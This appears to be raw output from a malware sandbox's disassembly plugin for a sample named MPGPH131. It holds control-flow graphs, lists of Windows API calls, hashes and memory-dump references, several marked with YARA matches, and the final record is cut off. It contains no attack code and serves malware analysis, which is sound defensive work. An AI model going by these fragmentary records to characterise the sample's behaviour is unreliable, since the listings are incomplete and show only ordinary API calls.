                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorFileLastPointer
                                  • String ID:
                                  • API String ID: 2976181284-0
                                  • Opcode ID: e250e0b9294de1fbebb30158c0191d8da4f10ea1f4cb8114ed21abc28b3e9f32
                                  • Instruction ID: 23aa52e679b98d3520941f79751565a15ca390d55e27bdc0cdd5aea59c04b9d7
                                  • Opcode Fuzzy Hash: e250e0b9294de1fbebb30158c0191d8da4f10ea1f4cb8114ed21abc28b3e9f32
                                  • Instruction Fuzzy Hash: 0101C436610155AFCB09CF69DC45DEE7B2BEB85331F240208FC119B291EBB1EE918B90

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 349 66379c-6637b0 GetLastError 350 6637b2-6637ba call 664e65 349->350 351 6637cc-6637d6 call 664ea4 349->351 358 6637c7 350->358 359 6637bc-6637c5 350->359 356 6637dc-6637e4 call 663e63 351->356 357 6637d8-6637da 351->357 362 6637e9-6637ef 356->362 360 663841-66384c SetLastError 357->360 358->351 359->360 363 663802-663810 call 664ea4 362->363 364 6637f1-663800 call 664ea4 362->364 370 663812-663820 call 664ea4 363->370 371 663829-66383e call 663479 call 664823 363->371 369 663821-663827 call 664823 364->369 378 663840 369->378 370->369 371->378 378->360
                                  APIs
                                  • GetLastError.KERNEL32(?,?,0065ACB4,006648E0,?,?,0064E0EB,?,?,?,?,?,00572D8D,0064B16C,?,?), ref: 006637A0
                                  • SetLastError.KERNEL32(00000000,?,?,0064B16C), ref: 00663842
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast
                                  • String ID:
                                  • API String ID: 1452528299-0
                                  • Opcode ID: 6f4dde4b84df62f37385985520f4f520d071173ade7713dc5f4d0c228603d765
                                  • Instruction ID: 52aabf3222524b7159fa590989bd4e0d76f0349f944a8c0e62529af621f49dcc
                                  • Opcode Fuzzy Hash: 6f4dde4b84df62f37385985520f4f520d071173ade7713dc5f4d0c228603d765
                                  • Instruction Fuzzy Hash: 8A1121702042316ED7923BB59CC6EAB2A5FAF01778B10413CF104863A3DF528F0546A8

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 381 5dba20-5dba3f 382 5dbb6c call 572040 381->382 383 5dba45-5dba58 381->383 388 5dbb71 call 571fa0 382->388 384 5dba5a 383->384 385 5dba83-5dba8b 383->385 387 5dba5c-5dba61 384->387 389 5dba8d-5dba92 385->389 390 5dba94-5dbaa4 385->390 391 5dba64-5dba65 call 64cd02 387->391 396 5dbb76-5dbb7b call 652220 388->396 389->387 393 5dbaa6-5dbaab 390->393 394 5dbab3-5dbab5 390->394 401 5dba6a-5dba6f 391->401 393->388 397 5dbab1 393->397 398 5dbac7 394->398 399 5dbab7-5dbac5 call 64cd02 394->399 397->391 400 5dbac9-5dbaec 398->400 399->400 404 5dbaee-5dbb18 call 64e9e0 call 64ef60 400->404 405 5dbb43-5dbb69 call 64e9e0 call 64ef60 400->405 401->396 406 5dba75-5dba81 401->406 417 5dbb2c-5dbb40 call 64cf83 404->417 418 5dbb1a-5dbb28 404->418 406->400 418->396 419 5dbb2a 418->419 419->417
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 005DBB71
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID:
                                  • API String ID: 118556049-0
                                  • Opcode ID: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
                                  • Instruction ID: 6529fcfbb46cf998987f74c5b43e0019763d66c8205c738b590a08474c14a440
                                  • Opcode Fuzzy Hash: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
                                  • Instruction Fuzzy Hash: 40412372900109DBDB25DF6CD8816AEBBA6FF44310F16066BF804EB345D730DE1087A5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 422 64cd02-64cd05 423 64cd14-64cd17 call 65b99c 422->423 425 64cd1c-64cd1f 423->425 426 64cd07-64cd12 call 65f248 425->426 427 64cd21-64cd22 425->427 426->423 430 64cd23-64cd27 426->430 431 571fa0-571ff0 call 571f80 call 64e96b call 64e0c1 430->431 432 64cd2d 430->432 432->432
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00571FDE
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID:
                                  • API String ID: 2659868963-0
                                  • Opcode ID: 322cf9d13eedde78652f7e60c3ec681ba757b9497fc64ac9a7ad59a43de402ea
                                  • Instruction ID: 6516bdd202d6418eafa5fb23458baac5ef8d701f744f5dda222c81d0f3a023c0
                                  • Opcode Fuzzy Hash: 322cf9d13eedde78652f7e60c3ec681ba757b9497fc64ac9a7ad59a43de402ea
                                  • Instruction Fuzzy Hash: 20012B3580020D67C714AFA8EC014897FAEDF02360B508239F9189B540FB70E590C7E5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 439 663e63-663e6e 440 663e70-663e7a 439->440 441 663e7c-663e82 439->441 440->441 442 663eb0-663ebb call 65acaf 440->442 443 663e84-663e85 441->443 444 663e9b-663eac RtlAllocateHeap 441->444 448 663ebd-663ebf 442->448 443->444 445 663e87-663e8e call 661a03 444->445 446 663eae 444->446 445->442 452 663e90-663e99 call 65f248 445->452 446->448 452->442 452->444
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,0064B16C,?), ref: 00663EA4
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 04e187e810cf988ca7cc8c0e6407d37c740b43530f1fce4aef8645a3d689e945
                                  • Instruction ID: 081253c19989c5f338ce8f7533c75637d4145492a353ffa63e3000233f55b81d
                                  • Opcode Fuzzy Hash: 04e187e810cf988ca7cc8c0e6407d37c740b43530f1fce4aef8645a3d689e945
                                  • Instruction Fuzzy Hash: 8DF0B432A00235669B326F728D05B9B374BAF41761B154117BC059A380CB72FE0486F4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 455 66489d-6648a9 456 6648db-6648e6 call 65acaf 455->456 457 6648ab-6648ad 455->457 464 6648e8-6648ea 456->464 459 6648c6-6648d7 RtlAllocateHeap 457->459 460 6648af-6648b0 457->460 461 6648b2-6648b9 call 661a03 459->461 462 6648d9 459->462 460->459 461->456 467 6648bb-6648c4 call 65f248 461->467 462->464 467->456 467->459
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 006648CF
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 20874c1e6fc91679fa91d72bfc8f65db2df595145dc37c2741a4156bf62e72f1
                                  • Instruction ID: eb9db9aeaed8543a4721170cfceb6434afb23abf1391c4ac7680d72ff7f1d231
                                  • Opcode Fuzzy Hash: 20874c1e6fc91679fa91d72bfc8f65db2df595145dc37c2741a4156bf62e72f1
                                  • Instruction Fuzzy Hash: 8EE06D311026A19AE72177A69C05BEB368B9F823B1F15133EAC45A7691DF60DC0082E5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 470 829b8c-829b97 471 829ba0-829ba3 470->471 472 829b99-829b9e 470->472 473 829baa-829bbe VirtualAlloc 471->473 474 829ba5 471->474 472->473 474->473
                                  APIs
                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00829BB7
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmp, Offset: 006D2000, based on PE: true
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 788cc3e1962191186ccee4a8cb5f4d0540ef6b6224f83d3fc9c4b19a6febbf38
                                  • Instruction ID: c0821fa9178ffc9cd42eaffe433bd1444831d6ee6a7c36ab13f279e4cf067211
                                  • Opcode Fuzzy Hash: 788cc3e1962191186ccee4a8cb5f4d0540ef6b6224f83d3fc9c4b19a6febbf38
                                  • Instruction Fuzzy Hash: 03E0EC7530012C9BDB10CE4CE844B5B339EF78A330F108011F549D7605C235EC519771
                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,?,?), ref: 0057A7CD
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0057A7DD
                                  • GetModuleHandleA.KERNEL32(?), ref: 0057A845
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0057A84C
                                  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 0057A858
                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000), ref: 0057A8D1
                                  • CloseHandle.KERNEL32(?), ref: 0057A908
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 0057A98D
                                  • ResetEvent.KERNEL32(00000000), ref: 0057A996
                                  • CreateThread.KERNEL32(00000000,00000000,0057A5B0,?,00000000,00000000), ref: 0057A9BA
                                  • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 0057A9C6
                                  • RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 0057AA0C
                                  • CloseHandle.KERNEL32(?), ref: 0057AA4A
                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000001), ref: 0057AA56
                                  • CloseHandle.KERNEL32(?), ref: 0057AA71
                                  • CloseHandle.KERNEL32(00000000), ref: 0057AAD5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Handle$Close$Process$AddressCreateCurrentEventModuleProcString$AnsiObjectOpenResetSingleThreadUnicodeWait
                                  • String ID: File
                                  • API String ID: 3800441322-749574446
                                  • Opcode ID: 023fd1c83c5b7fc3437d01ddeefe0d0d986b893609edcfaedbdd372af587f8a4
                                  • Instruction ID: 9ef2f738bcd1f5ad8afe384794c0842c2bcb31849f21d9998f27885346bcb958
                                  • Opcode Fuzzy Hash: 023fd1c83c5b7fc3437d01ddeefe0d0d986b893609edcfaedbdd372af587f8a4
                                  • Instruction Fuzzy Hash: AEC1DE70D002489FDF15CFA4DD45BAEBBB6FF45300F10406DE909AB292E770A984DBA2
                                  APIs
                                  • GetFileAttributesExW.KERNEL32(?,00000000,?,?,?), ref: 0064B4B3
                                  • GetLastError.KERNEL32(?,?), ref: 0064B4BD
                                  • FindFirstFileW.KERNEL32(?,?,?,?), ref: 0064B4D4
                                  • GetLastError.KERNEL32(?,?), ref: 0064B4DF
                                  • FindClose.KERNEL32(00000000,?,?), ref: 0064B4EB
                                  • ___std_fs_open_handle@16.LIBCPMT ref: 0064B5A4
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorFileFindLast$AttributesCloseFirst___std_fs_open_handle@16
                                  • String ID:
                                  • API String ID: 2340820627-0
                                  • Opcode ID: f082f53864257c284923488ee1574ed18d60b235756e587150fc89b6009ddfc4
                                  • Instruction ID: 1f44d4dbd892cc042da00556544a7be278ad3c825b1f5cfcca071788bb88a6f2
                                  • Opcode Fuzzy Hash: f082f53864257c284923488ee1574ed18d60b235756e587150fc89b6009ddfc4
                                  • Instruction Fuzzy Hash: 4A71AF74A006199FDB64CF28DC84BE9B7BABF05320F145259E859E3390DB70DE51CB91
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,0066E1D6,?,?), ref: 0066DF5D
                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,0066E1D6,?,?), ref: 0066DF86
                                  • GetACP.KERNEL32(?,?,0066E1D6,?,?), ref: 0066DF9B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: ACP$OCP
                                  • API String ID: 2299586839-711371036
                                  • Opcode ID: 79c7d47995b193324c58e5e75f8114ae7c659694a9d4b6726cc0bd538c67ef2b
                                  • Instruction ID: 582db58c97e3b72a6c2fc13f78f59d5fc296bd373acdf24ed7991e9530d96352
                                  • Opcode Fuzzy Hash: 79c7d47995b193324c58e5e75f8114ae7c659694a9d4b6726cc0bd538c67ef2b
                                  • Instruction Fuzzy Hash: DB218E72F00100AADB349F54C901BE777A7EF94B64B5A8564E90BDB311EB32DE81C390
                                  APIs
                                    • Part of subcall function 0066364B: GetLastError.KERNEL32(?,?,0065DD18,?,?,00000003,00652013,?,00651F82,?,00000016,00652191), ref: 0066364F
                                    • Part of subcall function 0066364B: SetLastError.KERNEL32(00000000,00000016,00652191,?,?,?,?,?,00000000,?,?,?,?,?,?,00572D8D), ref: 006636F1
                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0066E1A8
                                  • IsValidCodePage.KERNEL32(?), ref: 0066E1E6
                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0066E1F9
                                  • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0066E241
                                  • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0066E25C
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                  • String ID:
                                  • API String ID: 415426439-0
                                  • Opcode ID: 709ee7b6debb93d18019e9f73d863c524567b07cf52a2501fb9e25b9b7fdfc49
                                  • Instruction ID: fb3ce0a060b416d43efb0df03640acfce04c172d516f02590c8452a935629437
                                  • Opcode Fuzzy Hash: 709ee7b6debb93d18019e9f73d863c524567b07cf52a2501fb9e25b9b7fdfc49
                                  • Instruction Fuzzy Hash: D7518E75A00209ABEF10EFA5CC41AEAB3BEAF19700F144469E914EB291E7719A45CB61
                                  APIs
                                    • Part of subcall function 0066364B: GetLastError.KERNEL32(?,?,0065DD18,?,?,00000003,00652013,?,00651F82,?,00000016,00652191), ref: 0066364F
                                    • Part of subcall function 0066364B: SetLastError.KERNEL32(00000000,00000016,00652191,?,?,?,?,?,00000000,?,?,?,?,?,?,00572D8D), ref: 006636F1
                                  • GetACP.KERNEL32(?,?,?,?,?,?,00660A83,?,?,?,?,?,-00000050,?,?,?), ref: 0066D7EA
                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00660A83,?,?,?,?,?,-00000050,?,?), ref: 0066D821
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 0066D984
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true
                                  • Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$CodeInfoLocalePageValid
                                  • String ID: utf8
                                  • API String ID: 607553120-905460609
                                  • Opcode ID: d178783fe878e5421caec7947fa4b3d8c89c68801f08b1d6f517acc1e223d25d
